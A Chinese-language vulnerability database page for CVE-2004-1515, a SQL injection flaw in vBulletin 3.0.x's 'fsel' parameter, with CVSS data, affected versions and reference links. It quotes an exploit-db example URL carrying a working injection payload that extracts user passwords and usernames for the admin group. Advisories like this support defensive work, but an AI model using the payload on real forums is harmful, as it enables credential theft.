CVE-2004-1515
CVSS7.5
发布时间 :2004-12-31 00:00:00
修订时间 :2016-10-17 22:55:33
NMCOE    

[原文]SQL injection vulnerability in (1) ttlast.php and (2) last10.php in vBulletin 3.0.x allows remote attackers to execute arbitrary SQL statements via the fsel parameter, as demonstrated using last.php.


[CNNVD]vBulletin SQL注入漏洞(CNNVD-200412-225)

        vBulletin 3.0.x版本中的(1)ttlast.php和(2)last10.php存在SQL注入漏洞。远程攻击者可以借助fsel参数执行任意SQL语句,正如使用last.php。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:jelsoft:vbulletin:3.0.6
cpe:/a:jelsoft:vbulletin:3.0.5
cpe:/a:jelsoft:vbulletin:3.0_beta_2
cpe:/a:jelsoft:vbulletin:3.0.0_can4
cpe:/a:jelsoft:vbulletin:3.0.0
cpe:/a:jelsoft:vbulletin:3.0.0_beta_2
cpe:/a:jelsoft:vbulletin:3.0.4
cpe:/a:jelsoft:vbulletin:3.0.3
cpe:/a:jelsoft:vbulletin:3.0.2
cpe:/a:jelsoft:vbulletin:3.0.1
cpe:/a:jelsoft:vbulletin:3.0.0_rc4

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1515
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1515
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-225
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=110019198507100&w=2
(UNKNOWN)  BUGTRAQ  20041111 SQL injection in vBulletin forums (last10.php)

- 漏洞信息

vBulletin SQL注入漏洞
高危 SQL注入
2004-12-31 00:00:00 2005-10-20 00:00:00
远程  
        vBulletin 3.0.x版本中的(1)ttlast.php和(2)last10.php存在SQL注入漏洞。远程攻击者可以借助fsel参数执行任意SQL语句,正如使用last.php。

- 公告与补丁

        

- 漏洞信息 (631)

vBulletin LAST.PHP SQL Injection Vulnerability (EDBID:631)
php webapps
2004-11-15 Verified
0 n/a
N/A [点击下载]
Example:

http://www.example.com/last.php?fsel=,user.password%20as%20title,user.%20%20%20%20username%20as%20lastposter%20FROM%20user,thread%20%20%20%20%20WHERE%20usergroupid=6%20LIMIT%201

# milw0rm.com [2004-11-15]
		

- 漏洞信息

11701
vBulletin Last 10 Topics Add-on last.php fsel Parameter SQL Injection
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality, Loss of Integrity Solution Unknown
Exploit Public Uncoordinated Disclosure

- 漏洞描述

vBulletin Last 10 Topics Add-on contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the 'last.php' script not properly sanitizing user-supplied input to the 'fsel' parameter. This may allow an attacker to inject or manipulate SQL queries in the back-end database.

- 时间线

2004-11-11 Unknow
2004-11-11 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站